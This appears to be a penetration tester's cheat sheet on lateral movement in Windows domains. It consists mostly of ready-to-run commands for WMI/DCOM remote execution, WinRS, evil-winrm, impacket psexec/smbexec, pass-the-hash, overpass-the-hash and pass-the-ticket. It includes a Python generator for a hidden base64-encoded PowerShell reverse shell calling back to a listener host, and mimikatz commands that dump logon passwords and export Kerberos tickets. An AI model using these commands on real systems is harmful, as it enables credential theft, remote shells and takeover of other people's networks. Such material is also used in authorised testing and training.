Lateral Move

Windows Management Instrumentation (WMI)

Spawning a process

wmic /node:<RHOST> /user:<USERNAME> /password:<PASSWORD> process call create "cmd"

Store Credentials

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Instanciate Distributed Component Object MOdel (DCOM)

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options 
$command = 'cmd';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Establish a Reverse shell

revshell_encoder.py

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Payload Encoding

python3 encode.py

powershell -nop -w hidden -e JAB<--- SNIP --->CkA

Execution

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options 
$command = 'powershell -nop -w hidden -e JAB<--- SNIP --->CkA';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Windows Remote Shell (WinRS)

Prerequisites

User needs to be part of the Administrators or Remote Management Users group on the target host

Execution

winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "cmd /c hostname & whoami"
winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "powershell -nop -w hidden -e JAB<--- SNIP --->CkA"

PowerShell

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <RHOST> -Credential $credential
Enter-PSSession 1

MSSQL (Port 1397)

Find mssql access

cme mssql <ip> -u <user> -p <password> -d <domain>

Users with SQLAdmin (BloodHound)

MATC p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p

Trust Link

SQLServerLinkCrawl

Get-SQLServerLinkCrawl -username <user> -password <password> -Verbose -Instance <sqlInstance> -Query "<query>"

Metasploit

Log in

mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

db

enum_db

cmd

impersonate

trustlink

Local User

cme

cme smb -u <user> -p <password> <ip> --local-auth

impacket

ClearText Password

Interactive Shell

impacket-PsExec

impacket-psexec <user>@<IP>

PsExec.exe

mimikatz

Pseudo-shell (file write and read)

smbexec

smbexec.py <domain>/<user>:<password>@<ip> "command"

wmiexec

cme

Protocols

WinRM

evil-winrm -i <ip> -u <user> -p <password>

evil-winrm -i <ip> -c cert.pem -k key.pem -S

RDP

SMB

MSSQL

NTLM Hash

Pass the Hash (PTH)

Interactive Shell

impacket-psexec

impacket-psexec <user>@<IP> -hashes ':<ntlm>'

PsExec.exe

wmiexec

mimikatz

Pseudo-shell (file write and read)

smbexec

smbexec.py -hashes ":<hash>" <user>@<ip> "command"

wmiexec

crackmapexec

Protocols

WinRM

evil-winrm -i <ip> -u <user> -H <hash>

RDP

SMB

MSSQL

Kerberos

Overpass the Hash

We load mimikatz to grab the ntlm hash of the user that we are going to craft a kerberos ticket

.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

The essence of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is with the sekurlsa::pth command from Mimikatz.

mimikatz # sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Let's list the cached Kerberos tickets with klist.

klist

No Kerberos tickets have been cached, but this is expected since jen has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the server with net use.

net use \\<RHOST>

Let's confirm that now we have the ticket

klist

Let's try that now, running .\PsExec.exe to launch cmd remotely on the machine as the user.

.\PsExec.exe \\<RHOST> cmd

Pass the Ticket (ccache / kirbi)

PreRequisites

Export an already existing ticket of a user

mimikatz.exe

The above command parsed the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

We can verify newly generated tickets with dir, filtering out on the kirbi extension

dir *.kirbi

As many tickets have been generated, we can just pick any TGS ticket in the user@rhost.kirbi format and inject it through mimikatz via the kerberos::ptt command.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-<USERNAME>@cifs-<RHOST>.kirbi

We should expect the ticket in our session when running klist.

klist

.\PsExec.exe \\<RHOST> cmd

mimikatz.ps1

Rubeus

Distributed Component Object Model (DCOM)

Prerequisites

Elevated PowerShell session

Creating and storing the Distributed Component Object Model

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<RHOST>"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c cmd","7")
tasklist | findstr "cmd"
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JAB<--- SNIP --->CkA","7")